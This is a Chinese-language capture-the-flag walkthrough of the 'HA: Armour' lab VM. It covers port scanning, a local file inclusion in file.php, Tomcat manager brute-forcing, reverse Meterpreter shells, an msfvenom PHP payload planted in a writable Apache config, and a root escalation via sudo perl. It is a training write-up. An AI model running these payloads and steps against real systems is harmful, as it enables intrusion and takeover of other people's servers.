• HA: Armour-Write-up



    下载地址:点我

    bilibili:点我

    信息收集

    • nmap扫存活找到IP为:192.168.116.140
    ➜  ~ nmap -sn 192.168.116.1/24      
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
    Nmap scan report for 192.168.116.1
    Host is up (0.00031s latency).
    Nmap scan report for 192.168.116.140
    Host is up (0.00074s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
    ➜  ~ nmap -A -T4 192.168.116.140 -p-
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
    Nmap scan report for 192.168.116.140
    Host is up (0.0018s latency).
    Not shown: 65531 closed ports
    PORT      STATE SERVICE VERSION
    80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: HA: Armour
    8009/tcp  open  ajp13   Apache Jserv (Protocol v1.3)
    | ajp-methods: 
    |_  Supported methods: GET HEAD POST OPTIONS
    8080/tcp  open  http    Apache Tomcat 9.0.24
    |_http-favicon: Apache Tomcat
    |_http-title: Apache Tomcat/9.0.24
    65534/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
    |   256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
    |_  256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
    ➜  ~
    
    • 开放80,8009,8080端口,都是Web服务分别是Apache httpd,Apache Jserv和Apache Tomcat,还有一个65534端口为ssh服务。
    • 指定端口连接ssh,得到第一个flag:HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA},和提示:TheOlympics
    ➜  ~ ssh 192.168.116.140 -p65534      
    The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
    ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.
    
                                                                                                 
           db         88888888ba   88b           d88    ,ad8888ba,    88        88  88888888ba   
          d88b        88      "8b  888b         d888   d8"'    `"8b   88        88  88      "8b  
         d8'`8b       88      ,8P  88`8b       d8'88  d8'        `8b  88        88  88      ,8P  
        d8'  `8b      88aaaaaa8P'  88 `8b     d8' 88  88          88  88        88  88aaaaaa8P'  
       d8YaaaaY8b     88""""88'    88  `8b   d8'  88  88          88  88        88  88""""88'    
      d8""""""""8b    88    `8b    88   `8b d8'   88  Y8,        ,8P  88        88  88    `8b    
     d8'        `8b   88     `8b   88    `888'    88   Y8a.    .a8P   Y8a.    .a8P  88     `8b   
    d8'          `8b  88      `8b  88     `8'     88    `"Y8888Y"'     `"Y8888Y"'   88      `8b  
                                                                                                 
                                                                                                 
                                    www.hackingarticles.in
    
                     HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}
                            
                                  Hint 1: TheOlympics
    
    kali-team@192.168.116.140's password:
    
    • 浏览器访问80端口,F12发现注释里有armour,notes.txt,还有69,开始不知道什么意思。但是对TCP/UDP端口列表熟悉的话,可以猜出来是TFTP(小型文件传输协议)的端口,详细TCP/UDP端口列表
    • 可以使用nmap加UDP协议判断69端口是否开放。
    ➜  ~ sudo  nmap -sU -p69 192.168.116.140
    [sudo] kali-team 的密码:
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
    Nmap scan report for 192.168.116.140
    Host is up (0.00073s latency).
    
    PORT   STATE         SERVICE
    69/udp open|filtered tftp
    MAC Address: 00:0C:29:E7:98:9F (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
    
    • 因为要发送UDP报文,所以要加sudo以Root权限执行。发现目标有开放69端口。
    • TFTP客户端连上服务端下载notes.txt文件,得到第二个flag。
    ➜  ~ atftp                
    tftp> connect 192.168.116.140
    tftp> get notes.txt
    tftp> quit 
    ➜  ~ cat notes.txt
    Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}
    
    Hint 2: maybeevena
    ➜  ~
    
    • 还有一个提示maybeevena,不知道什么鬼。先爆破80端口的php后缀文件。
    ➜  ~ dirb http://192.168.116.140 -X .php
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Wed Oct  9 22:23:10 2019
    URL_BASE: http://192.168.116.140/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.116.140/ ----
    + http://192.168.116.140/file.php (CODE:200|SIZE:0)                                                                                                                                                                                           
                                                                                                                                                                                                                                                  
    -----------------
    END_TIME: Wed Oct  9 22:23:13 2019
    DOWNLOADED: 4612 - FOUND: 1
    ➜  ~
    
    • 找到file.php,打开页面一片空白,fuzz参数。
    ➜  ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd' 
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
    ********************************************************
    * Wfuzz 2.4 - The Web Fuzzer                           *
    ********************************************************
    
    Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
    Total requests: 77
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                       
    ===================================================================
    
    000000033:   200        28 L     36 W     1437 Ch     "file"                                                                                                                                                                        
    
    Total time: 0.130840
    Processed Requests: 77
    Filtered Requests: 76
    Requests/sec.: 588.5036
    
    ➜  ~
    
    • 找到参数为file,还是一个文件读取漏洞,因为是Apache的服务,所以先想到读取Apache相关的文件,敏感的文件有.htpasswd,一般在/etc/apache2/.htpasswd
    ➜  ~ curl http://192.168.116.140/file.php?file=/etc/apache2/.htpasswd                      
    Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}
    
    
    Hint 3: StarBucks
    ➜  ~
    
    • 找到第三个flag,和第三个提示:StarBucks。
    • 官方提示:

    P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

    • 三个提示拼起来就是:TheOlympics maybeevena starBucks,强行当密码。

    tomcat 获取会话

    • 浏览器打开8080端口,发现是一个Tomcat的管理页面,密码已经知道,现在来爆破用户名。
    ➜  CeWL git:(master) ✗ ./cewl.rb -v  http://192.168.116.140 -d 10 -w dict.txt 
    CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
    Starting at http://192.168.116.140
    Visiting: http://192.168.116.140, got response code 200
    Attribute text found:
    
    
    Offsite link, not following: https://hackingarticles.in
    Writing words to file
    ➜  CeWL git:(master) ✗ cat dict.txt           
    Armour
    PAGE
    CONTENT
    Header
    ARMOUR
    Collection
    Armours
    MCU
    Photo
    Grid
    armour
    End
    Page
    Content
    Footer
    Powered
    Hacking
    Articles
    notes
    txt
    ➜  CeWL git:(master) ✗ pwd               
    /home/kali-team/Kali-Team_Tools/CeWL
    ➜  CeWL git:(master) ✗
    
    • 使用CeWL爬80端口的网页生成用户名的字典,使用MSF对Tomcat进行登录密码枚举。
    msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options 
    
    Module options (auxiliary/scanner/http/tomcat_mgr_login):
    
       Name              Current Setting                                                 Required  Description
       ----              ---------------                                                 --------  -----------
       BLANK_PASSWORDS   true                                                            no        Try blank passwords for all users
       BRUTEFORCE_SPEED  5                                                               yes       How fast to bruteforce, from 0 to 5
       DB_ALL_CREDS      false                                                           no        Try each user/password couple stored in the current database
       DB_ALL_PASS       false                                                           no        Add all passwords in the current database to the list
       DB_ALL_USERS      false                                                           no        Add all users in the current database to the list
       PASSWORD          TheOlympicsmaybeevenaStarBucks                                  no        The HTTP password to specify for authentication
       PASS_FILE         /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
       Proxies                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS            192.168.116.140                                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT             8080                                                            yes       The target port (TCP)
       SSL               false                                                           no        Negotiate SSL/TLS for outgoing connections
       STOP_ON_SUCCESS   false                                                           yes       Stop guessing when a credential works for a host
       TARGETURI         /manager/html                                                   yes       URI for Manager login. Default is /manager/html
       THREADS           1                                                               yes       The number of concurrent threads
       USERNAME                                                                          no        The HTTP username to specify for authentication
       USERPASS_FILE     /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
       USER_AS_PASS      false                                                           no        Try the username as the password for all users
       USER_FILE         /home/kali-team/Kali-Team_Tools/CeWL/dict.txt                   no        File containing users, one per line
       VERBOSE           true                                                            yes       Whether to print output for all attempts
       VHOST                                                                             no        HTTP server virtual host
    
    msf5 auxiliary(scanner/http/tomcat_mgr_login) >
    
    • 不知道为什么,我重启服务器后才枚举出来,用户名是:armour。
    • [+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
    • Tomcat上传木马有很多方法,可以手工上传WAR文件部署。
    • 这里就使用MSF比较省时间。
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword                                                                                                                                                                                  
    set httppassword  
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
    httppassword => TheOlympicsmaybeevenaStarBucks
    msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
    httpusername => armour
    msf5 exploit(multi/http/tomcat_mgr_upload) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:4444 
    [*] Retrieving session ID and CSRF token...
    [*] Uploading and deploying wJ0oIWvcGX...
    [*] Executing wJ0oIWvcGX...
    [*] Undeploying wJ0oIWvcGX ...
    [*] Sending stage (53867 bytes) to 192.168.116.140
    [*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800
    
    meterpreter >
    
    • 枚举本地开发端口
    meterpreter > shell 
    Process 61 created.
    Channel 75 created.
    netstat -antp
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
    tcp        0      0 127.0.0.1:8081          0.0.0.0:*               LISTEN      -                   
    tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
    tcp        0      0 0.0.0.0:65534           0.0.0.0:*               LISTEN      -                   
    tcp6       0      0 :::8080                 :::*                    LISTEN      572/java            
    tcp6       0      0 :::80                   :::*                    LISTEN      -                   
    tcp6       0      0 :::65534                :::*                    LISTEN      -                   
    tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      572/java            
    tcp6       0      0 :::8009                 :::*                    LISTEN      572/java            
    tcp6       0      0 192.168.116.140:50706   192.168.116.1:4444      ESTABLISHED 685/java
    
    • 这里发现目标主机上监听着8081端口,只能在目标本地进行访问,所以我们可以把端口转发出来,MSF里有自带的。
    meterpreter > portfwd /?
    Usage: portfwd [-h] [add | delete | list | flush] [args]
    
    
    OPTIONS:
    
        -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
        -R        Indicates a reverse port forward.
        -h        Help banner.
        -i <opt>  Index of the port forward entry to interact with (see the "list" command).
        -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
        -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
        -r <opt>  Forward: remote host to connect to.
    meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
    [*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
    meterpreter >
    
    • 现在访问自己的8081端口就可以拿到第四个flag。
    ➜  ~ curl http://127.0.0.1:8081                                        
    Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
    
    • 或者直接在目标主机访问
    tomcat@ubuntu:~$ cd /tmp
    cd /tmp
    tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
    wget http://127.0.0.1:8081
    --2019-10-10 04:46:42--  http://127.0.0.1:8081/
    Connecting to 127.0.0.1:8081... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 56 [text/html]
    Saving to: ‘index.html’
    
    index.html          100%[===================>]      56  --.-KB/s    in 0s      
    
    2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]
    
    tomcat@ubuntu:/tmp$ cat index.html
    cat index.html
    Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
    tomcat@ubuntu:/tmp$
    

    权限提升

    • 查找GUID文件
    tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
    find / -perm -g=s -type f 2>/dev/null
    /sbin/pam_extrausers_chkpwd
    /sbin/unix_chkpwd
    /usr/bin/crontab
    /usr/bin/expiry
    /usr/bin/chage
    /usr/bin/ssh-agent
    /usr/bin/wall
    /usr/bin/bsd-write
    /usr/bin/mlocate
    tomcat@ubuntu:/$
    
    • 查找SUID文件
    tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    /bin/mount
    /bin/umount
    /bin/su
    /bin/ping
    /bin/fusermount
    /usr/bin/vmware-user-suid-wrapper
    /usr/bin/traceroute6.iputils
    /usr/bin/passwd
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/bin/sudo
    /usr/bin/gpasswd
    /usr/bin/chfn
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    tomcat@ubuntu:/$ 
    tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
    find / -perm -4000 2>dev/null | xargs ls -la
    -rwsr-xr-x 1 root root        30800 Aug 11  2016 /bin/fusermount
    -rwsr-xr-x 1 root root        43088 Oct 15  2018 /bin/mount
    -rwsr-xr-x 1 root root        64424 Jun 28 04:05 /bin/ping
    -rwsr-xr-x 1 root root        44664 Mar 22  2019 /bin/su
    -rwsr-xr-x 1 root root        26696 Oct 15  2018 /bin/umount
    -rwsr-xr-x 1 root root        76496 Mar 22  2019 /usr/bin/chfn
    -rwsr-xr-x 1 root root        44528 Mar 22  2019 /usr/bin/chsh
    -rwsr-xr-x 1 root root        75824 Mar 22  2019 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root        40344 Mar 22  2019 /usr/bin/newgrp
    -rwsr-xr-x 1 root root        59640 Mar 22  2019 /usr/bin/passwd
    -rwsr-xr-x 1 root root       149080 Jan 17  2018 /usr/bin/sudo
    -rwsr-xr-x 1 root root        18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
    -rwsr-xr-x 1 root root        10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
    -rwsr-xr-- 1 root messagebus  42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
    tomcat@ubuntu:/$
    
    • 查找可写目录,发现有/var/www/html
    tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
    find / -writable -type d 2>/dev/null
    /dev/mqueue
    /dev/shm
    /tftpboot
    /var/lib/php/sessions
    /var/www/html
    /var/tmp
    /proc/902/task/902/fd
    /proc/902/fd
    /proc/902/map_files
    /tmp
    
    • 查找root用户权限可写文件
    tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
    <ev/null | grep -v "/proc/" |xargs ls -al |grep root
    -rwxrwxrwx 1 root   root     7224 Sep 21 11:30 /etc/apache2/apache2.conf
    -rwxrwxrwx 1 root   tomcat   2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
    --w--w--w- 1 root   root        0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
    -rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
    tomcat@ubuntu:/$
    
    • 找到/etc/apache2/apache2.conf/opt/tomcat/conf/tomcat-users.xml文件可写。
    • /opt/tomcat/conf/tomcat-users.xml只有之前的账号密码,只能看/etc/apache2/apache2.conf文件了。
    • 查找passwd文件,每行记录又被冒号(:)分隔为7个字段分别对应:用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell
    • group文件对应:组名:口令:组标识号:组内用户列表
    tomcat@ubuntu:/$ cat /etc/passwd
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
    syslog:x:102:106::/home/syslog:/usr/sbin/nologin
    messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
    _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
    uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
    armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
    tomcat:x:1001:1001::/opt/tomcat:/bin/false
    aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
    tomcat@ubuntu:/$ 
    
    
    tomcat@ubuntu:~$ cat /etc/group
    cat /etc/group
    root:x:0:
    daemon:x:1:
    bin:x:2:
    sys:x:3:
    adm:x:4:syslog,armour
    tty:x:5:
    disk:x:6:
    lp:x:7:
    mail:x:8:
    news:x:9:
    uucp:x:10:
    man:x:12:
    proxy:x:13:
    kmem:x:15:
    dialout:x:20:
    fax:x:21:
    voice:x:22:
    cdrom:x:24:armour
    floppy:x:25:
    tape:x:26:
    sudo:x:27:armour
    audio:x:29:
    dip:x:30:armour
    www-data:x:33:
    backup:x:34:
    operator:x:37:
    list:x:38:
    irc:x:39:
    src:x:40:
    gnats:x:41:
    shadow:x:42:
    utmp:x:43:
    video:x:44:
    sasl:x:45:
    plugdev:x:46:armour
    staff:x:50:
    games:x:60:
    users:x:100:
    nogroup:x:65534:
    systemd-journal:x:101:
    systemd-network:x:102:
    systemd-resolve:x:103:
    input:x:104:
    crontab:x:105:
    syslog:x:106:
    messagebus:x:107:
    mlocate:x:108:
    uuidd:x:109:
    ssh:x:110:
    armour:x:1000:
    lpadmin:x:111:armour
    sambashare:x:112:armour
    ssl-cert:x:113:
    tomcat:x:1001:
    aarti:x:1002:
    tomcat@ubuntu:~$
    
    • 找到一个普通用户aarti和armour
    • 把Apache配置文件下载到自己的电脑,Apache默认以www-data用户启动的
    http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
    
    • 修改用户和组,让Apache以上面那个普通用户启动,为什么不能以Root用户启动能?因为不重新编译是不能用Root权限的,这样Web服务也起不来。所以只能改aarti的
    • 覆盖Apache配置文件
    tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
    <p://192.168.116.1:8000/apache2.conf -O apache2.conf
    --2019-10-10 04:52:49--  http://192.168.116.1:8000/apache2.conf
    Connecting to 192.168.116.1:8000... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 7195 (7.0K) [text/plain]
    Saving to: ‘apache2.conf’
    
    apache2.conf        100%[===================>]   7.03K  --.-KB/s    in 0s      
    
    utime(apache2.conf): Operation not permitted
    2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]
    
    tomcat@ubuntu:/etc/apache2$ cat apache2.conf
    
    • 写入后到80端口服务下的目录写木马。(这是官方出题人写的),我试了不对,创建文件的用户为Tomcat,aarti用户读不了这个文件,所以是访问不了的,服务端报500错误。
    • 后来我利用文件包含Apache的配置文件获取到了会话。
    • 就是把Shell写进Apache2.conf,再利用上面发现的文件包含漏洞。
    ➜  ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
    ➜  ~ cat shell.php >> apache2.conf 
    
    msf5 exploit(multi/handler) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:2333 
    [*] Sending stage (38288 bytes) to 192.168.116.140
    [*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800
    
    meterpreter > getuid 
    Server username: aarti (1002)
    meterpreter > shell 
    Process 12388 created.
    Channel 0 created.
    python3.6 -c 'import pty;pty.spawn("/bin/bash")'
    aarti@ubuntu:/var/www/html$ whoami
    whoami
    aarti
    aarti@ubuntu:/var/www/html$
    

    提Root权限

    • 列举无密码sudo,发现有一个perl
    aarti@ubuntu:/var/www/html$ sudo -l
    sudo -l
    Matching Defaults entries for aarti on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
    
    User aarti may run the following commands on ubuntu:
        (root) NOPASSWD: /usr/bin/perl
    aarti@ubuntu:/var/www/html$ 
    aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
    sudo perl -e 'exec "/bin/bash";'
    root@ubuntu:/var/www/html# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@ubuntu:/var/www/html# 
    root@ubuntu:~# ls
    ls
    final.txt
    root@ubuntu:~# cat final.txt
    cat final.txt
    
             ______   ______    _____   _     _  ______  
       /   (_____  |  ___   / ___  | |   | |(_____  
      /     _____) )| | _ | || |   | || |   | | _____) )
     / /  (_____ ( | || || || |   | || |   | |(_____ ( 
    | |__| |      | || || || || |___| || |___| |      | |
    |______|      |_||_||_||_| \_____/  \______|      |_|
                                                         
    
        IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}
    
    
    !! Congrats you have finished this task !!
    							
    Contact us here:
    								
    Hacking Articles : https://twitter.com/rajchandel/
    		
    AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
    	
    +-+-+-+-+-+ +-+-+-+-+-+-+-+
     |E|n|j|o|y| |H|A|C|K|I|N|G|
     +-+-+-+-+-+ +-+-+-+-+-+-+-+	
    root@ubuntu:~#
    
  • 相关阅读:
    今天终于把IBM的rose2007破解版 弄好了
    Oracle_Statspack性能诊断工具
    ORACLE配置STATSPACK步骤
    为什么需要Analyze表
    四种数据ETL模式
    ETL数据抽取策略
    excel中宏与VBA的关系
    RMAN基础知识(二)
    常见Web技术之间的关系,你了解多少?
    RMAN 还原与恢复
  • 原文地址:https://www.cnblogs.com/Kali-Team/p/12212396.html
Copyright © 2020-2023  润新知